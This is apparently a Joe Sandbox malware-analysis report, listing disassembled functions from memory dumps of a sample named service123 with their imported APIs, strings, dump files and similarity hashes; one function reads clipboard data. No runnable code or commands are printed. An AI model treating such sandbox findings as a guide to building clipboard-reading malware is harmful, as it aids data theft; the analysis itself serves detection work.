Instruction Fuzzy Hash: 1F51AF7270A6118FD700DF29D48465AFBF5BFA6308F50899DD4948B718E332DA05CF92

Function 6C2BE730 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BE75A
wcslen.MSVCRT ref: 6C2BE7CA

Strings

basic_string: construction from null is not valid, xrefs: 6C2BE792, 6C2BE802, 6C2BE872

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 17a59eccb6ef830f5cbea7b73de8979aee2f362065c48239012fb99b7d628bcf
Instruction ID: 9f4d863eccdd786fd2df591d00e9b7d9a539de5e8ff6f21051ed0e8343cedad4
Opcode Fuzzy Hash: 17a59eccb6ef830f5cbea7b73de8979aee2f362065c48239012fb99b7d628bcf
Instruction Fuzzy Hash: FA418EF5A056148FCB00FF2CD48584ABBE0BF54218F1649BDE8859B715E332E999CBD2

Function 6C2BE331 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BE35D
strlen.MSVCRT ref: 6C2BE3AD

Strings

basic_string: construction from null is not valid, xrefs: 6C2BE37F, 6C2BE3CF, 6C2BE41F

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 25c4c3415d9a6c90b2a473d499eb72418c1eacec03433f1f1a27d26763f7bc42
Instruction ID: 25942e03ea4ae47f991adaf1aa4c4b43a71a0ad2b9ef9301bea29f21c29cd116
Opcode Fuzzy Hash: 25c4c3415d9a6c90b2a473d499eb72418c1eacec03433f1f1a27d26763f7bc42
Instruction Fuzzy Hash: 8E3152B16053158FCB10BF28C48589ABBE4BF09668B0648ADECC49B715D376E859CF92

Function 008F7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 008F7C92
MultiByteToWideChar.KERNEL32 ref: 008F7CD5

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: b09b5ba4c86ba322b6cd374a91a034ee5f0a78eddae4c1e8d88395f4f84f5958
Instruction ID: 7e5710964be5645353b679788626f7a6a47dcc0b433b1c5698226f6a4734b63f
Opcode Fuzzy Hash: b09b5ba4c86ba322b6cd374a91a034ee5f0a78eddae4c1e8d88395f4f84f5958
Instruction Fuzzy Hash: 183100B05083458FE710EF39D48466ABBF0FF85304F44892EEA948B354E3B6D849CB92

Function 6C2A9660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C2A96B2
MultiByteToWideChar.KERNEL32 ref: 6C2A96F5

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: f20cb7149ad3649a8fe864cf9e2fd790b97eab3601216d382e82b0152db76097
Instruction ID: 3ea76521358892cfad72fdf40edfd43ceee1a06377f967dd2f69aa3dd8e85f2d
Opcode Fuzzy Hash: f20cb7149ad3649a8fe864cf9e2fd790b97eab3601216d382e82b0152db76097
Instruction Fuzzy Hash: 173126B45093468FDB00EF6AE48424ABBF0BF86319F10891DF8948B390D7B6D959CB52

Function 6C29F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C29F5C1

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 1565936ae2861d391e6e1bde8bfff1cbebba6ca3e503d4fe18392ff11115c262
Instruction ID: 6a1122df5f4ae96f969c103314bf3a10b0ee4b2ed96368f676be8216a155ac38
Opcode Fuzzy Hash: 1565936ae2861d391e6e1bde8bfff1cbebba6ca3e503d4fe18392ff11115c262
Instruction Fuzzy Hash: DD413870A093058FDB50DF2AD5847977BF8FB56319F248619ECA84B794D330E446CBA2

Function 6C29F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C29F751

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 23ec514e761ba9312d68be975c7f6f7e3176c0bd4dfc9c7a440f1e07eb3ffc08
Instruction ID: a6ee208221dbd22a3d239059921b14c36f8b7f4cbfeb0e1b56d1def2230ee0b1
Opcode Fuzzy Hash: 23ec514e761ba9312d68be975c7f6f7e3176c0bd4dfc9c7a440f1e07eb3ffc08
Instruction Fuzzy Hash: FE315A70A093058FDB409F6AC5887977BF8FB56319F24825AFC944B794D331D409CBA6

Function 6C29F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C29FA72
CreateSemaphoreW.KERNEL32 ref: 6C29FAB7
WaitForSingleObject.KERNEL32 ref: 6C29FB00

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 0871bad240430b9f560fadf6d78a9e1fca0b760cf2c5f1a885d269e62a524c01
Instruction ID: 75ae133c8c8d7f1f40c0691acbf6362290abc12d9a116b94bd473b8fbc9efa50
Opcode Fuzzy Hash: 0871bad240430b9f560fadf6d78a9e1fca0b760cf2c5f1a885d269e62a524c01
Instruction Fuzzy Hash: E9311770A093058FDB50DF2AC598797BBF8FB5A319F148619E8988B380D334D5058BA6

Function 6C29FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C29FBF2
CreateSemaphoreW.KERNEL32 ref: 6C29FC37
WaitForSingleObject.KERNEL32 ref: 6C29FC80

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: deb9e5a1f87d7830e1aab106fbc9aded5ea49ce3db6794359f18d4949376bfdb
Instruction ID: 7211bda558ec27fc52144114ca33658a068bb6dcd67008d162085770263dc1e4
Opcode Fuzzy Hash: deb9e5a1f87d7830e1aab106fbc9aded5ea49ce3db6794359f18d4949376bfdb
Instruction Fuzzy Hash: 623115706093068BDB40DF2AC5887577BF8FB5A359F108259EC988B384C334D449CBA6

Function 6C2955A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2972FE

Strings

this, xrefs: 6C2955B3
}, xrefs: 6C297392
{parm#, xrefs: 6C2972D9

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 0164b7cf2a96032d1fd06aefd8f6440d4b39a495728ed34f9694bb0e57ef157e
Instruction ID: c32e03b2c5a3acda58b827957a8ac588ba9d5ff6af161d562285a16947bc036b
Opcode Fuzzy Hash: 0164b7cf2a96032d1fd06aefd8f6440d4b39a495728ed34f9694bb0e57ef157e
Instruction Fuzzy Hash: 50217C7150D346CFD7118F1AC0843E9BBE1AF95704F1889BEECC84FA0AD77994858BA6

Function 008F1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 008F106B
__p__fmode.MSVCRT ref: 008F1070
__p__commode.MSVCRT ref: 008F107D

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 36287015b11edc810e37a911b4f6a5d4bb68b63a617e5f92395d29b9434ad7d2
Instruction ID: f0b09524e1f398fd90217dee6043664048cfe610d5636488710797a97a68f42e
Opcode Fuzzy Hash: 36287015b11edc810e37a911b4f6a5d4bb68b63a617e5f92395d29b9434ad7d2
Instruction Fuzzy Hash: F3215E70600B09CBDB14AF34C90977533A2FBC0344F948568D758CB256EF7A98C6DB96

Function 6C2A9BD7 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C2A9BE7
GlobalLock.KERNEL32 ref: 6C2A9BF9
GlobalUnlock.KERNEL32 ref: 6C2A9C1A
CloseClipboard.USER32 ref: 6C2A9C23
CloseClipboard.USER32 ref: 6C2A9C48
GetClipboardSequenceNumber.USER32 ref: 6C2A9C6E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockNumberSequenceUnlock
String ID:
API String ID: 1345600146-0
Opcode ID: a7ee200718f73c927771e7d09419e7ab3512a2d0c04e92e6147d918f08e383eb
Instruction ID: 4d9b1fc6ad6872d18090b3a3e59b3a02b250aa045c59d5f5f92c520a6d6e5fdf
Opcode Fuzzy Hash: a7ee200718f73c927771e7d09419e7ab3512a2d0c04e92e6147d918f08e383eb
Instruction Fuzzy Hash: ECF0ADB2B08B018FDB007F79914C1AEBBF1ABA6301F040938D8869A240DB3194198B93

Function 6C309D20 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C309D35
strlen.MSVCRT ref: 6C309D3F
memcpy.MSVCRT ref: 6C309D68
setlocale.MSVCRT ref: 6C309D7C

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: f8108977bac6d24bb0e228bd3d23697d48f75679d5e941c108b75f6ab49e6b1b
Instruction ID: d019f8333527a8f6404cf14916369509ef4d54008c4c313e1cf697a5c1e0092e
Opcode Fuzzy Hash: f8108977bac6d24bb0e228bd3d23697d48f75679d5e941c108b75f6ab49e6b1b
Instruction Fuzzy Hash: 03F05EB160D3109ED3007FA994453AFFAE4EF80744F018C1ED8C88B712D7798449CB92

Function 6C32B740 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

T6l, xrefs: 6C3651F8
H6l, xrefs: 6C365240

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: H6l$T6l
API String ID: 0-4228486740
Opcode ID: 86e74540851f72ca5cefe23bcec3aacab476468c4c7511829c4da159552099e5
Instruction ID: a3ec428f74649cefcefa95a6aecb6ec03a23c1863c91d6330fede3803300137a
Opcode Fuzzy Hash: 86e74540851f72ca5cefe23bcec3aacab476468c4c7511829c4da159552099e5
Instruction Fuzzy Hash: BCE1DBB4604B188BDB417F3685805AEBAA1BF4164CF116C2CD4C25BF05CF78894AAFE7

Function 008F4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 008F4596
@, xrefs: 008F4647

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 242b36e65c4a1129d2315b3e63975f428cf54775150a6fb62537075a651a4eb6
Instruction ID: 7e8ab81b1aa05b047b0e740a2d93cc52caf04f36927685c1b257a355f8cc5c1c
Opcode Fuzzy Hash: 242b36e65c4a1129d2315b3e63975f428cf54775150a6fb62537075a651a4eb6
Instruction Fuzzy Hash: 83A17B315083998BD7209F34C0903BBBBE1FB85318F249A1EEAD8D7252D735D949DB82

Function 6C2A4C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C2A4C66
@, xrefs: 6C2A4D17

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 3dbad16196f99515f655afb499f3c450e1979256729555b828f882f36518bfec
Instruction ID: 73ecf770f5696700e4c2a8ad034739fdc6d1789d1b5a32945af4dbe1a9cfa019
Opcode Fuzzy Hash: 3dbad16196f99515f655afb499f3c450e1979256729555b828f882f36518bfec
Instruction Fuzzy Hash: A6A17E7160C39A8BD721CE65C09079BBBE2BBC5319F148A2DECDC47641DB35D54ACB82

Function 008F4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 008F4DBE

Part of subcall function 008F2830: fputc.MSVCRT ref: 008F28F8

Strings

(null), xrefs: 008F4C27
@, xrefs: 008F4647

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: a957c69487aac35ffc48195e96d7b9a2b5f816398c5ce64eb38bd6ee4098d37e
Instruction ID: 8cbb208612406e777f8729230d86d884a75cf0577cff323b819dfd30ed4f3b0d
Opcode Fuzzy Hash: a957c69487aac35ffc48195e96d7b9a2b5f816398c5ce64eb38bd6ee4098d37e
Instruction Fuzzy Hash: BE918E316083598BD7219F3480903BBBBE1FB85718F149A1EDAD8D7342D735D94ADB82

Function 6C2A52F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2A548E

Part of subcall function 6C2A2F00: fputc.MSVCRT ref: 6C2A2FC8

Strings

@, xrefs: 6C2A4D17
(null), xrefs: 6C2A52F7

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 2a95911e85321c941119b3b67eb0019a1c98f1801d99d0544251808cdcd0d879
Instruction ID: 1d063e5debd3b26bd8f39789c0493fe4cb44ae74b5b7ef7f8b4de7a1a8331be0
Opcode Fuzzy Hash: 2a95911e85321c941119b3b67eb0019a1c98f1801d99d0544251808cdcd0d879
Instruction Fuzzy Hash: E8918D7160C35A8BD7218E65809079BBBE2BBC5319F148A2DECDC87741DB35E50A8B82

Function 6C325B60 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C325B9A
wcslen.MSVCRT ref: 6C325C2C
wcslen.MSVCRT ref: 6C325CBE
strlen.MSVCRT ref: 6C325D50

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 530e5ca7c22f39467000f1c05fffca2ff0139a81081e8fab195870ca5b498799
Instruction ID: fe6b28ba573445c8715cf00f97d45acace3d52f8dde1417080c5849074a37211
Opcode Fuzzy Hash: 530e5ca7c22f39467000f1c05fffca2ff0139a81081e8fab195870ca5b498799
Instruction Fuzzy Hash: CAF13BB0A056098FCB00DF6DC1849AEFBF0BF44318B118659E895DB758EB39EA45CF81

Function 6C325380 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3253BA
wcslen.MSVCRT ref: 6C32544C
wcslen.MSVCRT ref: 6C3254DE
strlen.MSVCRT ref: 6C325570

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 60bf7d218402633b1d105d046759d02c08c67947dfb88bcf4c182425a6e8b8ef
